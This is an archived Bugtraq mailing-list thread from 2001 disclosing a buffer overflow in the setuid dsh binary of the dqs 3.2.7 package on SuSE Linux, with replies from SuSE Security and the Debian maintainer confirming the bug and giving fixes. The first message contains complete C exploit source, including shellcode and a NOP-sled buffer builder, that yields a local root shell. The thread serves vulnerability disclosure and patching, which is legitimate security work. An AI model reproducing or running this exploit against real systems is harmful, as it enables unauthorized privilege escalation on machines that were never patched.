6517688 2001-05-19 00:09 +0000 /183 rader/ dex dex <dexgod@softhome.net> Sänt av: joel@lysator.liu.se Importerad: 2001-05-19 04:52 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <17096> Ärende: dqs 3.2.7 local root exploit. ------------------------------------------------------------ From: dex dex <dexgod@softhome.net> To: bugtraq@securityfocus.com Message-ID: <20010519000911.4356.qmail@securityfocus.com> Subject: dqs 3.2.7 local root exploit. Hello. DESCRIPTION: I found a buffer overflow vunerability on the /usr/bin/dsh (dqs 3.2.7 package). I really don't know if this bug was discovered already. if thats right, then sorry =). If a long line on the first argument is gived, the program gives a SIGSEGV signal. This bug was reported to Drake Diedrich, Mantainer for dqs (Drake.Diedrich@anu.edu.adu). AFFECTED: SusE 6.3, 6.4, 7.0 have the dqs 3.2.7 by default an then it are vunerable, maybe others. FIX: Remove the SUID permission |root@netdex /root|# ls -la /usr/bin/dsh -rwsr-xr-x 1 root root 502748 May 18 00:36 /usr/bin/dsh |root@netdex /root|# chmod -s /usr/bin/dsh |root@netdex /root|# ls -la /usr/bin/dsh -rwxr-xr-x 1 root root 502748 May 18 00:36 /usr/bin/dsh |root@netdex /root|# EXAMPLE EXPLOIT: You can found the exploit at www.raza-mexicana.org/programas/programas/qsexp.c And here it is: ----CUT HERE---- /* - dqsexp.c - */ /********************************************************************/ /* /usr/bin/dsh(dqs 3.2.7 package) local root exploit. */ /* SuSE 6.3, 6.4, and 7.0 are vunerable. */ /* dex@raza-mexicana.org <> http://www.raza-mexicana.org */ /* Saludos: dr_fdisk^, yield, vlad, deadsector, trovalz, fatal, */ /* megaflop y a todo raza. que weba escribirlos todos XD. */ /* En especial saludos al espa~olete(NOP) :P, ya sabes porque. */ /* */ /* - dex@raza-mexicana.org <> http://www.raza-mexicana.org - */ /********************************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #define BUFFSIZE 2772 #define OFFSET 0 #define ALIGN 0 unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } static char code[]= /* stolen from mount.c :P */ "\x29\xc0" /* subl %eax, %eax */ "\xb0\x46" /* movb $70, %al */ "\x29\xdb" /* subl %ebx, %ebx */ "\xb3\x0c" /* movb $12, %bl */ "\x80\xeb\x0c" /* subb $12, %bl */ "\x89\xd9" /* movl %ebx, %ecx */ "\xcd\x80" /* int $0x80 */ "\xeb\x18" /* jmp callz */ "\x5e" /* popl %esi */ "\x29\xc0" /* subl %eax, %eax */ "\x88\x46\x07" /* movb %al, 0x07(%esi) */ "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ "\x89\x76\x08" /* movl %esi, 0x08(%esi) */ "\xb0\x0b" /* movb $0x0b, %al */ "\x87\xf3" /* xchgl %esi, %ebx */ "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */ "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */ "\xcd\x80" /* int $0x80 */ "\xe8\xe3\xff\xff\xff" /* call start */ "\x2f\x62\x69\x6e\x2f\x73\x68"; void main(int argc, char **argv) { int i; unsigned long addr; char *buffer; int offset=OFFSET; int buffsize=BUFFSIZE; int align=ALIGN; if (argc > 1 ) offset = atoi(argv[1]); if (argc > 2 ) align = atoi(argv[2]); if (argc > 3 ) buffsize = atoi(argv[3]); buffer = (char *)malloc(buffsize + 8); addr = get_sp() - offset; for(i = 0; i < buffsize; i += 4) { *(long *)&buffer[i] = 0x90909090; } *(long *)&buffer[buffsize - 8] = addr; *(long *)&buffer[buffsize - 4] = addr; memcpy(buffer + buffsize - 8 - strlen(code) - align, code, strlen(code)); printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"); printf("[*] /usr/bin/dsh(dqs 3.2.7 package) local root exploit.\n"); printf("[*] - dex@raza-mexicana.org <> http://www.raza-mexicana.org - \n"); printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n"); printf("[*] Address=0x%x, Align=%d, Offset=%d\n", addr, align, offset); printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n"); printf("[*] Starting....\n"); execl("/usr/bin/dsh", "dsh", buffer, "/etc/motd", NULL); } ----EOF---- ================================================= Mail: dex@raza-mexicana.org Page: http://www.raza-mexicana.org =============================================== (6517688) /dex dex <dexgod@softhome.net>/-(Ombruten) 6519015 2001-05-19 05:26 +0200 /63 rader/ Roman Drahtmueller <draht@suse.de> Sänt av: joel@lysator.liu.se Importerad: 2001-05-19 20:46 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Externa svar till: draht@suse.de Mottagare: Bugtraq (import) <17099> Kommentar till text 6517688 av dex dex <dexgod@softhome.net> Ärende: Re: dqs 3.2.7 local root exploit. ------------------------------------------------------------ From: Roman Drahtmueller <draht@suse.de> To: <bugtraq@securityfocus.com> Message-ID: <ENOCOKE.draht.silence.0101051905112599024188505005-100000@suse> > DESCRIPTION: > I found a buffer overflow vunerability on the > /usr/bin/dsh (dqs 3.2.7 > package). > > I really don't know if this bug was discovered > already. if thats right, > then sorry =). No, this is yet unknown to security@suse.de. > If a long line on the first argument is gived, the > program gives a SIGSEGV > signal. > > This bug was reported to Drake Diedrich, Mantainer > for dqs > (Drake.Diedrich@anu.edu.adu). > > AFFECTED: > SusE 6.3, 6.4, 7.0 have the dqs 3.2.7 by default > an then it are vunerable, > maybe others. I confirm this vulnerability and that dqs has the setuid bit on the file /usr/bin/dsh, but the package (as a package in the clustering series) is not installed by default. The fix (to remove the suid bit) is correct. If you have selected to set the variable PERMISSION_SECURITY in /etc/rc.config to "secure local" in SuSE-7.1 (recommended for security-enhanced settings), you are not vulnerable. On SuSE-7.1, in addition to the chmod command below, change the files /etc/permissions.*, too, to reflect the removed suid bit. If you do not need the dqs package, simply remove it using the command rpm -e dqs Of course, we will provide update packages as soon as possible. > FIX: > Remove the SUID permission > |root@netdex /root|# ls -la /usr/bin/dsh > -rwsr-xr-x 1 root root 502748 May 18 > 00:36 /usr/bin/dsh > |root@netdex /root|# chmod -s /usr/bin/dsh > |root@netdex /root|# ls -la /usr/bin/dsh > -rwxr-xr-x 1 root root 502748 May 18 Regards, Roman Drahtmüller, SuSE Security. -- - - | Roman Drahtmüller <draht@suse.de> "Caution: Cape does not | SuSE GmbH - Security enable user to fly." | Nürnberg, Germany (Batman Costume warning label) | - - (6519015) /Roman Drahtmueller <draht@suse.de>/(Ombruten) 6519208 2001-05-19 14:09 +1000 /46 rader/ Drake Diedrich <Drake.Diedrich@anu.edu.au> Sänt av: joel@lysator.liu.se Importerad: 2001-05-19 21:59 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <17102> Kommentar till text 6517688 av dex dex <dexgod@softhome.net> Ärende: Re: dqs 3.2.7 local root exploit. ------------------------------------------------------------ On Sat, May 19, 2001 at 12:09:11AM -0000, dex dex wrote: > > DESCRIPTION: > I found a buffer overflow vunerability on the > /usr/bin/dsh (dqs 3.2.7 > package). > ... > > This bug was reported to Drake Diedrich, Mantainer > for dqs > (Drake.Diedrich@anu.edu.adu). > I maintain only the Debian packaging of the DQS suite. /usr/bin/dsh can be entirely removed from a DQS cluster with no ill effects, and was removed from the Debian packages in early 1998 as part of a general cleanup of the package. Debian 2.1 (slink) and later are not vulnerable. The original publisher (SCRI, Florida State University) is no longer maintaining DQS or employing the original author, but has also refused to relax distribution restrictions, making it difficult to found a new developer community. dqs (3.1.8-2) unstable; urgency=low * Summarize and rotate monthly accounting logs * Replaced /bin/mail with /usr/bin/sendmail * Made /etc/dqs/conf_file into a configureation file. Changed DQS_BIN. * Deleted dqs_options, dqs_random, and dsh * Moved qmaster and dqs_execd to /usr/lib/dqs, edit DQS_BIN in /etc/dqs/conf_file * Switched to debhelper from debstd * Added restart and force-reload to /etc/init.d/dqs * A million Lintian fixes. -- Drake Diedrich <Drake.Diedrich@anu.edu.au> Mon, 16 Feb 1998 11:47:04 +1100 -- Dr. Drake Diedrich, Head - Information and Communications Unit John Curtin School of Medical Research, GPO Box 334 Canberra ACT 2601 Voice: +61(2)6125-2528 FAX: +61(2)6125-4823 (6519208) /Drake Diedrich <Drake.Diedrich@anu.edu.au>/(Ombruten) Bilaga (application/pgp-signature) i text 6519209 6519209 2001-05-19 14:09 +1000 /12 rader/ Drake Diedrich <Drake.Diedrich@anu.edu.au> Importerad: 2001-05-19 21:59 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <17103> Bilaga (text/plain) till text 6519208 Ärende: Bilaga till: Re: dqs 3.2.7 local root exploit. ------------------------------------------------------------ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iQCVAwUBOwXyA9D4/OIVS4ptAQFKjwP/dAbOH7uJ2akj7JhVHCo2qobgG5v7p1Ab 8MWbaf6MojCOUJlHYKpYnhHKwCyWl6UicL3cPCQOkE5fPyarIOOVp9guFn7OR+nh YYVLOf3/sciJW4UKIVKYqtAppCcnnRdW9ckJAy+D4LZ1pySKcASMs1y4oUgndc3P xtx6WSn9hy0= =JRH2 -----END PGP SIGNATURE----- (6519209) /Drake Diedrich <Drake.Diedrich@anu.edu.au>/